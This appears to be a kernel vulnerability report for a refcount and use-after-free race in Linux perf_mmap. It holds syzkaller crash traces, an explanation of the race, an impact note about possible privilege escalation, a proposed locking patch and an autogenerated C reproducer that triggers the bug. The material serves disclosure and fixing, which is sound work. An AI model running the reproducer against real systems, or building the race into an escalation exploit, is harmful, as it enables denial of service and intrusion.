do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f7ef5cabb9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d
RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000
RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640
</TASK>
---[ end trace 0000000000000000 ]---
EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
EXT4-fs (loop0): Total free blocks count 0
EXT4-fs (loop0): Free/Dirty block details
EXT4-fs (loop0): free_blocks=12386304
EXT4-fs (loop0): dirty_blocks=16387
EXT4-fs (loop0): Block reservation details
EXT4-fs (loop0): i_reserved_data_blocks=16387
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
SYZFAIL: failed to recv rpc
fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor)
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
Reproduce
----------
The issue is reproducible using the attached C reproducer. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown.
The reproducer follows this execution flow:
1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.
2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.
3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires mmap_mutex to set up the buffer and then drops it. Meanwhile, thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger destruction or detachment of the ring_buffer.
4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window.
5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report.
Security impact
---------------
The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a use-after-free (UAF) condition. The immediate symptom is typically a kernel warning or a denial of service through a system hang or panic, especially in environments with panic_on_warn enabled, but the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage the UAF state for heap grooming. If the freed memory is reallocated with a controlled structure, this could potentially be exploited to achieve local privilege escalation, making it a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible.
Patch
--------------
From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread
closes the event or detaches the buffer during this window, the
reference count of rb can drop to zero, leading to a UAF or
refcount saturation when map_range() or subsequent logic attempts
to use it.
Fix this by extending the scope of mmap_mutex to cover the entire
setup process, including map_range(), ensuring the buffer remains
valid until the mapping is complete.
Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
kernel/events/core.c | 42 +++++++++++++++++++++---------------------
1 file changed, 21 insertions(+), 21 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
ret = perf_mmap_aux(vma, event, nr_pages);
if (ret)
return ret;
- }
-
- /*
- * Since pinned accounting is per vm we cannot allow fork() to copy our
- * vma.
- */
- vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
- vma->vm_ops = &perf_mmap_vmops;
- mapped = get_mapped(event, event_mapped);
- if (mapped)
- mapped(event, vma->vm_mm);
-
- /*
- * Try to map it into the page table. On fail, invoke
- * perf_mmap_close() to undo the above, as the callsite expects
- * full cleanup in this case and therefore does not invoke
- * vmops::close().
- */
- ret = map_range(event->rb, vma);
- if (ret)
- perf_mmap_close(vma);
+ /*
+ * Since pinned accounting is per vm we cannot allow fork() to copy our
+ * vma.
+ */
+ vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+ vma->vm_ops = &perf_mmap_vmops;
+
+ mapped = get_mapped(event, event_mapped);
+ if (mapped)
+ mapped(event, vma->vm_mm);
+
+ /*
+ * Try to map it into the page table. On fail, invoke
+ * perf_mmap_close() to undo the above, as the callsite expects
+ * full cleanup in this case and therefore does not invoke
+ * vmops::close().
+ */
+ ret = map_range(event->rb, vma);
+ if (ret)
+ perf_mmap_close(vma);
+ }
return ret;
}
--
2.51.0
Request
-------
Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.
Best regards,
Haocheng Yu
Zhejiang University
Syzkaller hit 'WARNING: refcount bug in perf_mmap' bug.
audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff8881036bf678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c
RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000
RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c
R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000
R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0
FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0
PKRU: 55555554
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f4a5add3b9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d
RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000
RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0
</TASK>
---[ end trace 0000000000000000 ]---
Syzkaller reproducer:
# {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}}
pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff)
r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8)
mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0)
r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2)
mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0)
C reproducer:
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <endian.h>
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef __NR_pkey_mprotect
#define __NR_pkey_mprotect 329
#endif
static __thread int clone_ongoing;
static __thread int skip_segv;
static __thread jmp_buf segv_env;
static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) {
exit(sig);
}
uintptr_t addr = (uintptr_t)info->si_addr;
const uintptr_t prog_start = 1 << 20;
const uintptr_t prog_end = 100 << 20;
int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
int valid = addr < prog_start || addr > prog_end;
if (skip && valid) {
_longjmp(segv_env, 1);
}
exit(sig);
}
static void install_segv_handler(void)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_handler = SIG_IGN;
syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = segv_handler;
sa.sa_flags = SA_NODEFER | SA_SIGINFO;
sigaction(SIGSEGV, &sa, NULL);
sigaction(SIGBUS, &sa, NULL);
}
#define NONFAILING(...) \
({ \
int ok = 1; \
__atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \
if (_setjmp(segv_env) == 0) { \
__VA_ARGS__; \
} else \
ok = 0; \
__atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \
ok; \
})
#define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \
*(type*)(addr) = \
htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \
(((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
const char* reason;
(void)reason;
install_segv_handler();
intptr_t res = 0;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
}
// pkey_mprotect arguments: [
// addr: VMA[0x2000]
// len: len = 0x2000 (8 bytes)
// prot: mmap_prot = 0x5 (8 bytes)
// key: pkey (resource)
// ]
syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul,
/*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x8 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/(intptr_t)-1,
/*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul);
if (res != -1)
r[0] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x0 (8 bytes)
// flags: mmap_flags = 0x11 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x2 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
